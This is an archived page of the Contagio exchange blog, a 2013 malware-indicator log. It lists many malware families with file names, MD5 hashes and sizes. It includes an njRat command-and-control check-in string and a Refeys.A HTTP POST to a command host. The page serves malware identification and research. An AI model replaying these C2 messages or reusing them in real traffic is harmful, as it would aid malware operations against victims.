About contagio exchange

Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community-driven malware collection.
Edit Aug 2013 - The community is busy and Mila too, so this was not a very active site (my fault probably), so I will just be dumping malware strings here - it often helps in malware identification, and googling is the best way.
With just strings, it is not exactly a fun blog to read but might become a useful resource over time.
I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find them.
M
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Thursday, August 22, 2013

njRat / Backdoor.LV strings - APT



C2 checkin
lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'|Examiner|'|'|2013-06-21|'|'|USA|'|'|Win XP ProfessionalSP2 x86|'|'|No|'|'|0.5.0E|'|'|..|'|'|Y3B0YnRfUHJvY2Vzc19SZWdpc3RyeV9GaWxlX0luZm8ubG9nIC0gTm90ZXBhZA==|'|'|[endof]act|'|'| Y3B0YnRfUHJvY2Vzc19SZWdpc3RyeV9GaWxlX0luZm8ubG9nIC0gTm90ZXBhZA==

File: njRAt_1D3BAEDD747F6F9BF92C81EB9F63B34B
MD5:  1d3baedd747f6f9bf92c81eb9f63b34b
Size: 110080





Wednesday, August 21, 2013

Refeys.A strings - CRIME

Traffic

POST /sys.php HTTP/1.0
Host: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer:  http://www.gmail.com
Content-length: 112



File: Refeys.A_BEDE0DA1ABC1122ACF8AF91F6D6B289F.exe_
MD5:  bede0da1abc1122acf8af91f6d6b289f
Size: 58880

Monday, August 19, 2013

Nitedrem strings - CRIME

MD5:  508af8c499102ad2ebc1a83fdbcefecb
Size: 147456





Saturday, August 17, 2013

Sality strings - CRIME

File: sality
MD5:  ceaf4d9e1f408299144e75d7f29c1810
Size: 997537




Friday, August 16, 2013

Chebri.C strings - CRIME

File: Chebri_B605C8E99315C330A015F36DE2A870EE
MD5:  b605c8e99315c330a015f36de2a870ee
Size: 8704




Torpig miniloader strings - CRIME

File: Torpig miniloader_0F82964CF39056402EE2DE9193635B34
MD5:  0f82964cf39056402ee2de9193635b34
Size: 242688




Monday, August 12, 2013

Coswid strings - APT

File: D62CD4AD2A919B6ACFA6D49D446DFFDB_svchost.exe_
MD5:  d62cd4ad2a919b6acfa6d49d446dffdb
Size: 19968

See the other MD5 below


COOKIES Cookiebag Dalbot strings - APT (2)

File: COOKIEBAG_sample_543E03CC5872E9ED870B2D64363F518B
MD5:  543e03cc5872e9ed870b2d64363f518b
Size: 126976




COOKIES Cookiebag Dalbot strings - APT (1)

File: COOKIEBAG_sample_0C28AD34F90950BC784339EC9F50D288
MD5:  0c28ad34f90950bc784339ec9f50d288
Size: 151552




Citadel 1.3.5.1 strings - CRIME (2)

File: Citadel1.3.5.1_296DA66E2F5239F9AF433C1EFBCDC079
MD5:  296da66e2f5239f9af433c1efbcdc079
Size: 276992




Citadel 1.3.5.1 strings - CRIME (1)

File: Citadel1.3.5.1_439333E63DD1DCA5C23653BDBD740CFC
MD5:  439333e63dd1dca5c23653bdbd740cfc
Size: 245568




Beebus Warp strings - APT

File: Beebus_WARP_D7EC457BE3FAD8057580E07CAE74BECB
MD5:  d7ec457be3fad8057580e07cae74becb
Size: 80896




WEBC2-RAVE strings - APT

File: WEBC2-RAVE_sample_BF0EE4367EA32F8E3B911C304258E439
MD5:  bf0ee4367ea32f8e3b911c304258e439
Size: 13824

scroll for #2  WEBC2-RAVE_sample_438983192903F3FECF77500A39459EE6


Taleret strings - APT (2)

File: Taleret_5328CFCB46EF18ECF7BA0D21A7ADC02C
MD5:  5328cfcb46ef18ecf7ba0d21a7adc02c
Size: 126976




Taleret strings - APT (1)

File: Taleret_FED166A667AB9CBB1EF6331B8E9D7894
MD5:  fed166a667ab9cbb1ef6331b8e9d7894
Size: 36864

Ascii Strings:


Sunday, August 11, 2013

Alina POS v.5.6 strings - CRIME

File: Alinav5.6-POS_5A22ED78B6454E34217D07C4AF37B23B
MD5:  5a22ed78b6454e34217d07c4af37b23b
Size: 167936




Saturday, August 10, 2013

Alina POS v.5.3 strings - CRIME

File: Alina-POS_4C754150639AA3A86CA4D6B6342820BE
MD5:  4c754150639aa3a86ca4d6b6342820be
Size: 48128

Ascii Strings:


BunituB-Proxy strings - CRIME (3)


File: BunituB-Proxy_BC22DE23FB07EE9E3C02DD1D2B3E52B3
MD5:  bc22de23fb07ee9e3c02dd1d2b3e52b3
Size: 73728




BunituB-Proxy strings - CRIME (2)

File: BunituB-Proxy_B64D221166E494AC00251594304BE072
MD5:  b64d221166e494ac00251594304be072
Size: 15872




BunituB-Proxy strings - CRIME

File: BunituB-Proxy_A725B21C1F9D24ADA97564F3F152CF50
MD5:  a725b21c1f9d24ada97564f3f152cf50
Size: 16896



Blazebot strings - CRIME

File: Blazebot_DBAF6F1D0EAAB5DC0C88B9CEEC9EA95E.exe_
MD5:  dbaf6f1d0eaab5dc0c88b9ceec9ea95e
Size: 251957



Bladabindi strings - CRIME

File: fe3e87a746bbf71268a35dfc43a6396d1ef3a92e33b99e1350317183edb66da6
MD5:  82f0aeb7ce7c448b763055a10726ed7b
Size: 28672



Bitcoinminer strings - CRIME

File: Bitcoinminer_F865C199024105A2FFDF5FA98F391D74_syu.exe_
MD5:  f865c199024105a2ffdf5fa98f391d74
Size: 589798



Beebone Downloader strings - CRIME (2)

File: Beebone_Downloader_7F5EACBF1CACF19502260AF34ADEB8EF
MD5:  7f5eacbf1cacf19502260af34adeb8ef
Size: 32768



Beebone Downloader strings - CRIME

File: Beebone_Downloader_8C1AF0A0D20FF98D33C31C24D8967E4F
MD5:  8c1af0a0d20ff98d33c31c24d8967e4f
Size: 32768



Avatar Rootkit NETbotnet strings - CRIME

File: Avatar_Rootkit_NETbotnet_32d6644c5ea66e390070d3dc3401e54b_unpacked
MD5:  32d6644c5ea66e390070d3dc3401e54b
Size: 129024



Ardamax Keylogger strings - CRIME

File: ArdamaxKeylogger_E33AF9E602CBB7AC3634C2608150DD18
MD5:  e33af9e602cbb7ac3634c2608150dd18
Size: 802724



ArcomRat strings - CRIME

File: Arcomrat_4015DD5B27EB612CA5DC320033E284C5
MD5:  4015dd5b27eb612ca5dc320033e284c5
Size: 1024960



Andromeda Bot strings - CRIME

File: Andromeda_85F908A5BD0ADA2D72D138E038AECC7D_DHL-LABEL-ID-2456-8344-5362-5466.exe_
MD5:  85f908a5bd0ada2d72d138e038aecc7d
Size: 57344



Pandora DDoS bot strings - CRIME
